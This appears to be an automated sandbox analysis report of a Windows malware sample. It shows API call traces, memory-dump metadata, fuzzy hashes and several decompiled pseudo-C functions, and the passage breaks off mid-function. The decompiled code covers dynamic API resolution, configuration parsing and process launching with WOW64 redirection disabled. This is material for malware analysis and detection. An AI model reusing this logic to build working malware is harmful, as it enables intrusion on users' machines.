                                                                                                                                                                                                                                                                                    0x00fc634c
                                                                                                                                                                                                                                                                                    0x00fc6357
                                                                                                                                                                                                                                                                                    0x00fc635e
                                                                                                                                                                                                                                                                                    0x00fc6362
                                                                                                                                                                                                                                                                                    0x00fc636b
                                                                                                                                                                                                                                                                                    0x00fc636b
                                                                                                                                                                                                                                                                                    0x00fc637c
                                                                                                                                                                                                                                                                                    0x00fc637c
                                                                                                                                                                                                                                                                                    0x00fc638b
                                                                                                                                                                                                                                                                                    0x00fc6391
                                                                                                                                                                                                                                                                                    0x00fc6391
                                                                                                                                                                                                                                                                                    0x00fc639b
                                                                                                                                                                                                                                                                                    0x00fc639b
                                                                                                                                                                                                                                                                                    0x00fc63ac
                                                                                                                                                                                                                                                                                    0x00fc63ac
                                                                                                                                                                                                                                                                                    0x00fc63ba
                                                                                                                                                                                                                                                                                    0x00fc63ba
                                                                                                                                                                                                                                                                                    0x00fc63ca

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 00FC6142
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00FC6156
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00FC61A5
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00FC61C2
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00FC61E3
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00FC6201
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00FC6216
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00FC6237
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00FC6271
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00FC6291
                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00FC62AC
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00FC62BC
                                                                                                                                                                                                                                                                                    • RtlEnterCriticalSection.NTDLL(038F95F0), ref: 00FC62D0
                                                                                                                                                                                                                                                                                    • RtlLeaveCriticalSection.NTDLL(038F95F0), ref: 00FC62EE
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC5AE3: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00FC6301,00000000,038F9630), ref: 00FC5B0E
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC5AE3: lstrlen.KERNEL32(00000000,?,00000000,00FC6301,00000000,038F9630), ref: 00FC5B16
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC5AE3: strcpy.NTDLL ref: 00FC5B2D
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC5AE3: lstrcat.KERNEL32(00000000,00000000), ref: 00FC5B38
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC5AE3: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00FC6301,?,00000000,00FC6301,00000000,038F9630), ref: 00FC5B55
                                                                                                                                                                                                                                                                                    • StrTrimA.SHLWAPI(00000000,00FC92CC,00000000,038F9630), ref: 00FC631C
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC2829: lstrlen.KERNEL32(038F887A,00000000,00000000,00000000,00FC6328,00000000), ref: 00FC2839
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC2829: lstrlen.KERNEL32(?), ref: 00FC2841
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC2829: lstrcpy.KERNEL32(00000000,038F887A), ref: 00FC2855
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC2829: lstrcat.KERNEL32(00000000,?), ref: 00FC2860
                                                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,?), ref: 00FC633A
                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00FC6348
                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00FC634C
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00FC637C
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00FC638B
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,00000000,038F9630), ref: 00FC639B
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?), ref: 00FC63AC
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000), ref: 00FC63BA
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
                                                                                                                                                                                                                                                                                    • String ID: va\x
                                                                                                                                                                                                                                                                                    • API String ID: 1837416118-1859480093
                                                                                                                                                                                                                                                                                    • Opcode ID: 217f1aaf8e8000d341671c16bb439a1d18c660d911157ed5ebeea3fb1a681671
                                                                                                                                                                                                                                                                                    • Instruction ID: 0d6c53c94058efdab55b1fe84bc14ccaa54ddd4cd21eb1231146313370746d0c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 217f1aaf8e8000d341671c16bb439a1d18c660d911157ed5ebeea3fb1a681671
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C71AF7180821DAFC711DB68EE8BE9677ECFB88714B050519F959C3221D63AE805FB62
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 27%
                                                                                                                                                                                                                                                                                    			E00FC762C(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				long _v16;
                                                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                                                    				long _t43;
                                                                                                                                                                                                                                                                                    				intOrPtr _t44;
                                                                                                                                                                                                                                                                                    				intOrPtr _t46;
                                                                                                                                                                                                                                                                                    				void* _t48;
                                                                                                                                                                                                                                                                                    				void* _t49;
                                                                                                                                                                                                                                                                                    				void* _t50;
	intOrPtr _t54;
	intOrPtr _t57;
	void* _t58;
	void* _t59;
	void* _t60;
	intOrPtr _t66;
	void* _t71;
	void* _t74;
	intOrPtr _t75;
	void* _t77;
	intOrPtr _t79;
	intOrPtr* _t80;
	intOrPtr _t91;

	_t79 =  *0xfca38c; // 0x38f9ca8
	_v24 = 8;
	_t43 = GetTickCount();
	_push(5);
	_t74 = 0xa;
	_v16 = _t43;
	_t44 = E00FC5F43(_t74,  &_v16);
	_v8 = _t44;
	if(_t44 == 0) {
		_v8 = 0xfc91cc;
	}
	_t46 = E00FC43FD(_t79);
	_v12 = _t46;
	if(_t46 != 0) {
		_t80 = __imp__;
		_t48 =  *_t80(_v8, _t71);
		_t49 =  *_t80(_v12);
		_t50 =  *_t80(_a4);
		_t54 = E00FC5C4E(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
		_v20 = _t54;
		if(_t54 != 0) {
			_t75 =  *0xfca2d0; // 0x292d5a8
			_t16 = _t75 + 0xfcbad8; // 0x530025
			 *0xfca13c(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
			_push(4);
			_t77 = 5;
			_t57 = E00FC5F43(_t77,  &_v16);
			_v8 = _t57;
			if(_t57 == 0) {
				_v8 = 0xfc91d0;
			}
			_t58 =  *_t80(_v8);
			_t59 =  *_t80(_v12);
			_t60 =  *_t80(_a4);
			_t91 = E00FC5C4E(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
			if(_t91 == 0) {
				E00FC2A03(_v20);
			} else {
				_t66 =  *0xfca2d0; // 0x292d5a8
				_t31 = _t66 + 0xfcbbf8; // 0x73006d
				 *0xfca13c(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
				 *_a16 = _v20;
				_v24 = _v24 & 0x00000000;
				 *_a20 = _t91;
			}
		}
		E00FC2A03(_v12);
	}
	return _v24;
}





























APIs
• GetTickCount.KERNEL32 ref: 00FC7641
• lstrlen.KERNEL32(?,80000002,00000005), ref: 00FC7681
• lstrlen.KERNEL32(00000000), ref: 00FC768A
• lstrlen.KERNEL32(00000000), ref: 00FC7691
• lstrlenW.KERNEL32(80000002), ref: 00FC769E
• lstrlen.KERNEL32(?,00000004), ref: 00FC76FE
• lstrlen.KERNEL32(?), ref: 00FC7707
• lstrlen.KERNEL32(?), ref: 00FC770E
• lstrlenW.KERNEL32(?), ref: 00FC7715
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC2A03: HeapFree.KERNEL32(00000000,00000000,00FC4072,00000000,?,?,00000000,?,?,?,?,?,?,00FC44AE,00000000), ref: 00FC2A0F
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: lstrlen$CountFreeHeapTick
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2535036572-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 55403c889868d57186bcc5720c1bf12551fff45ba4530ed9bf299fbfb51cc8a3
                                                                                                                                                                                                                                                                                    • Instruction ID: 646637b46f720fc7ace55f3c27d6b5af98038627705665a4d78c97b826bb7619
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 55403c889868d57186bcc5720c1bf12551fff45ba4530ed9bf299fbfb51cc8a3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C412A7680021EEBCF11AFA4CE4AE9EBBB5EF44318F054094ED05A7221D7769A54FF90
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 61%
                                                                                                                                                                                                                                                                                    			E00FC7836(void* __eax, void* __ecx) {
                                                                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				void* _v28;
                                                                                                                                                                                                                                                                                    				long _v32;
                                                                                                                                                                                                                                                                                    				void _v104;
                                                                                                                                                                                                                                                                                    				char _v108;
                                                                                                                                                                                                                                                                                    				long _t39;
                                                                                                                                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                                                                                                                                                    				void* _t52;
                                                                                                                                                                                                                                                                                    				intOrPtr _t53;
                                                                                                                                                                                                                                                                                    				void* _t61;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t66;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t73;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t76;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t1 = __eax + 0x14; // 0x74183966
                                                                                                                                                                                                                                                                                    				_t71 =  *_t1;
                                                                                                                                                                                                                                                                                    				_t39 = E00FC71A3(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                                                                                                                                                                                                                                                                                    				_v8 = _t39;
                                                                                                                                                                                                                                                                                    				if(_t39 != 0) {
                                                                                                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                                                                                                    					return _v8;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				E00FC7973( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
                                                                                                                                                                                                                                                                                    				_t43 = _v12(_v12);
                                                                                                                                                                                                                                                                                    				_v8 = _t43;
                                                                                                                                                                                                                                                                                    				if(_t43 == 0 && ( *0xfca2b8 & 0x00000001) != 0) {
                                                                                                                                                                                                                                                                                    					_v32 = 0;
                                                                                                                                                                                                                                                                                    					asm("stosd");
                                                                                                                                                                                                                                                                                    					asm("stosd");
                                                                                                                                                                                                                                                                                    					asm("stosd");
                                                                                                                                                                                                                                                                                    					_v108 = 0;
                                                                                                                                                                                                                                                                                    					memset( &_v104, 0, 0x40);
                                                                                                                                                                                                                                                                                    					_t50 =  *0xfca2d0; // 0x292d5a8
                                                                                                                                                                                                                                                                                    					_t18 = _t50 + 0xfcb55b; // 0x73797325
                                                                                                                                                                                                                                                                                    					_t52 = E00FC1000(_t18);
                                                                                                                                                                                                                                                                                    					_v12 = _t52;
                                                                                                                                                                                                                                                                                    					if(_t52 == 0) {
                                                                                                                                                                                                                                                                                    						_v8 = 8;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_t53 =  *0xfca2d0; // 0x292d5a8
                                                                                                                                                                                                                                                                                    						_t20 = _t53 + 0xfcb73d; // 0x38f8ce5
                                                                                                                                                                                                                                                                                    						_t21 = _t53 + 0xfcb0af; // 0x4e52454b
                                                                                                                                                                                                                                                                                    						_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
                                                                                                                                                                                                                                                                                    						if(_t66 == 0) {
                                                                                                                                                                                                                                                                                    							_v8 = 0x7f;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_t73 = __imp__;
                                                                                                                                                                                                                                                                                    							_v108 = 0x44;
                                                                                                                                                                                                                                                                                    							 *_t73(0);
                                                                                                                                                                                                                                                                                    							_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
                                                                                                                                                                                                                                                                                    							 *_t73(1);
                                                                                                                                                                                                                                                                                    							if(_t61 == 0) {
                                                                                                                                                                                                                                                                                    								_v8 = GetLastError();
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								CloseHandle(_v28);
                                                                                                                                                                                                                                                                                    								CloseHandle(_v32);
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						HeapFree( *0xfca290, 0, _v12);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t76 = _v16;
                                                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
                                                                                                                                                                                                                                                                                    				E00FC2A03(_t76);
                                                                                                                                                                                                                                                                                    				goto L12;
                                                                                                                                                                                                                                                                                    			}

                                                                                                                                                                                                                                                                                    0x00fc78a0
                                                                                                                                                                                                                                                                                    0x00fc78a5
                                                                                                                                                                                                                                                                                    0x00fc78ad
                                                                                                                                                                                                                                                                                    0x00fc78b4
                                                                                                                                                                                                                                                                                    0x00fc78bb
                                                                                                                                                                                                                                                                                    0x00fc78be
                                                                                                                                                                                                                                                                                    0x00fc7952
                                                                                                                                                                                                                                                                                    0x00fc78c4
                                                                                                                                                                                                                                                                                    0x00fc78c4
                                                                                                                                                                                                                                                                                    0x00fc78c9
                                                                                                                                                                                                                                                                                    0x00fc78d0
                                                                                                                                                                                                                                                                                    0x00fc78e4
                                                                                                                                                                                                                                                                                    0x00fc78e8
                                                                                                                                                                                                                                                                                    0x00fc7939
                                                                                                                                                                                                                                                                                    0x00fc78ea
                                                                                                                                                                                                                                                                                    0x00fc78ea
                                                                                                                                                                                                                                                                                    0x00fc78f1
                                                                                                                                                                                                                                                                                    0x00fc78f8
                                                                                                                                                                                                                                                                                    0x00fc7910
                                                                                                                                                                                                                                                                                    0x00fc7916
                                                                                                                                                                                                                                                                                    0x00fc791a
                                                                                                                                                                                                                                                                                    0x00fc7934
                                                                                                                                                                                                                                                                                    0x00fc791c
                                                                                                                                                                                                                                                                                    0x00fc7925
                                                                                                                                                                                                                                                                                    0x00fc792a
                                                                                                                                                                                                                                                                                    0x00fc792a
                                                                                                                                                                                                                                                                                    0x00fc791a
                                                                                                                                                                                                                                                                                    0x00fc794a
                                                                                                                                                                                                                                                                                    0x00fc794a
                                                                                                                                                                                                                                                                                    0x00fc78be
                                                                                                                                                                                                                                                                                    0x00fc7959
                                                                                                                                                                                                                                                                                    0x00fc7962
                                                                                                                                                                                                                                                                                    0x00fc7966
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC71A3: GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,00FC7852,?,?,?,?,00000000,00000000), ref: 00FC71C8
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC71A3: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00FC71EA
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC71A3: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00FC7200
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC71A3: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00FC7216
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC71A3: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00FC722C
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC71A3: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00FC7242
                                                                                                                                                                                                                                                                                    • memset.NTDLL ref: 00FC78A0
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC1000: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,00FC4F1C,73797325), ref: 00FC1011
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC1000: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00FC102B
                                                                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(4E52454B,038F8CE5,73797325), ref: 00FC78D7
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00FC78DE
                                                                                                                                                                                                                                                                                    • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00FC78F8
                                                                                                                                                                                                                                                                                    • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00FC7916
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00FC7925
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00FC792A
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00FC792E
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?), ref: 00FC794A
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 91923200-0
                                                                                                                                                                                                                                                                                    • Opcode ID: d45b4ce1a792749325af19869031f83b2295acef0c91120cb4bb772f6af79954
                                                                                                                                                                                                                                                                                    • Instruction ID: f18fe059a4a75a2bb6091e27efa440d1fd6afd0999a85ba0ee9a51a8d22385b8
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d45b4ce1a792749325af19869031f83b2295acef0c91120cb4bb772f6af79954
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 93315972D0421AEBDB11ABA4DE4AEDEBFB8EF48350F104059E505A3120D775AA44EBA0
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                                                                                                                                                                    			E00FC374B(int* __ecx) {
                                                                                                                                                                                                                                                                                    				int _v8;
                                                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                                                    				signed int _t20;
                                                                                                                                                                                                                                                                                    				signed int _t25;
                                                                                                                                                                                                                                                                                    				char* _t31;
                                                                                                                                                                                                                                                                                    				char* _t32;
                                                                                                                                                                                                                                                                                    				char* _t33;
                                                                                                                                                                                                                                                                                    				char* _t34;
                                                                                                                                                                                                                                                                                    				char* _t35;
                                                                                                                                                                                                                                                                                    				void* _t36;
                                                                                                                                                                                                                                                                                    				void* _t37;
                                                                                                                                                                                                                                                                                    				intOrPtr _t38;
                                                                                                                                                                                                                                                                                    				signed int _t44;
                                                                                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                                                                                    				void* _t47;
                                                                                                                                                                                                                                                                                    				signed int _t49;
                                                                                                                                                                                                                                                                                    				signed int _t53;
                                                                                                                                                                                                                                                                                    				signed int _t57;
                                                                                                                                                                                                                                                                                    				signed int _t61;
                                                                                                                                                                                                                                                                                    				signed int _t65;
                                                                                                                                                                                                                                                                                    				signed int _t69;
                                                                                                                                                                                                                                                                                    				void* _t74;
                                                                                                                                                                                                                                                                                    				intOrPtr _t90;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t75 = __ecx;
                                                                                                                                                                                                                                                                                    				_t20 =  *0xfca2cc; // 0x63699bc3
                                                                                                                                                                                                                                                                                    				if(E00FC3D6B( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x110) {
                                                                                                                                                                                                                                                                                    					 *0xfca320 = _v12;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t25 =  *0xfca2cc; // 0x63699bc3
                                                                                                                                                                                                                                                                                    				if(E00FC3D6B( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
                                                                                                                                                                                                                                                                                    					_push(2);
                                                                                                                                                                                                                                                                                    					_pop(0);
                                                                                                                                                                                                                                                                                    					goto L48;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_t74 = _v12;
                                                                                                                                                                                                                                                                                    					if(_t74 == 0) {
                                                                                                                                                                                                                                                                                    						_t31 = 0;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_t69 =  *0xfca2cc; // 0x63699bc3
                                                                                                                                                                                                                                                                                    						_t31 = E00FC257B(_t75, _t74, _t69 ^ 0x724e87bc);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(_t31 != 0) {
                                                                                                                                                                                                                                                                                    						_t75 =  &_v8;
                                                                                                                                                                                                                                                                                    						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
                                                                                                                                                                                                                                                                                    							 *0xfca298 = _v8;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(_t74 == 0) {
                                                                                                                                                                                                                                                                                    						_t32 = 0;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_t65 =  *0xfca2cc; // 0x63699bc3
                                                                                                                                                                                                                                                                                    						_t32 = E00FC257B(_t75, _t74, _t65 ^ 0x2b40cc40);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(_t32 != 0) {
                                                                                                                                                                                                                                                                                    						_t75 =  &_v8;
                                                                                                                                                                                                                                                                                    						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
                                                                                                                                                                                                                                                                                    							 *0xfca29c = _v8;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(_t74 == 0) {
                                                                                                                                                                                                                                                                                    						_t33 = 0;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_t61 =  *0xfca2cc; // 0x63699bc3
                                                                                                                                                                                                                                                                                    						_t33 = E00FC257B(_t75, _t74, _t61 ^ 0x3b27c2e6);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(_t33 != 0) {
                                                                                                                                                                                                                                                                                    						_t75 =  &_v8;
                                                                                                                                                                                                                                                                                    						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
                                                                                                                                                                                                                                                                                    							 *0xfca2a0 = _v8;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(_t74 == 0) {
                                                                                                                                                                                                                                                                                    						_t34 = 0;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_t57 =  *0xfca2cc; // 0x63699bc3
                                                                                                                                                                                                                                                                                    						_t34 = E00FC257B(_t75, _t74, _t57 ^ 0x0602e249);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(_t34 != 0) {
                                                                                                                                                                                                                                                                                    						_t75 =  &_v8;
                                                                                                                                                                                                                                                                                    						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
                                                                                                                                                                                                                                                                                    							 *0xfca004 = _v8;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(_t74 == 0) {
                                                                                                                                                                                                                                                                                    						_t35 = 0;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_t53 =  *0xfca2cc; // 0x63699bc3
                                                                                                                                                                                                                                                                                    						_t35 = E00FC257B(_t75, _t74, _t53 ^ 0x3603764c);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(_t35 != 0) {
                                                                                                                                                                                                                                                                                    						_t75 =  &_v8;
                                                                                                                                                                                                                                                                                    						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
                                                                                                                                                                                                                                                                                    							 *0xfca02c = _v8;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(_t74 == 0) {
                                                                                                                                                                                                                                                                                    						_t36 = 0;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_t49 =  *0xfca2cc; // 0x63699bc3
                                                                                                                                                                                                                                                                                    						_t36 = E00FC257B(_t75, _t74, _t49 ^ 0x2cc1f2fd);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(_t36 != 0) {
                                                                                                                                                                                                                                                                                    						_push(_t36);
                                                                                                                                                                                                                                                                                    						_t46 = 0x10;
                                                                                                                                                                                                                                                                                    						_t47 = E00FC5A4E(_t46);
                                                                                                                                                                                                                                                                                    						if(_t47 != 0) {
                                                                                                                                                                                                                                                                                    							_push(_t47);
                                                                                                                                                                                                                                                                                    							E00FC461D();
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(_t74 == 0) {
                                                                                                                                                                                                                                                                                    						_t37 = 0;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_t44 =  *0xfca2cc; // 0x63699bc3
                                                                                                                                                                                                                                                                                    						_t37 = E00FC257B(_t75, _t74, _t44 ^ 0xb30fc035);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(_t37 != 0 && E00FC5A4E(0, _t37) != 0) {
                                                                                                                                                                                                                                                                                    						_t90 =  *0xfca37c; // 0x38f9630
                                                                                                                                                                                                                                                                                    						E00FC6027(_t90 + 4, _t42);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t38 =  *0xfca2d0; // 0x292d5a8
                                                                                                                                                                                                                                                                                    					_t18 = _t38 + 0xfcb2d2; // 0x38f887a
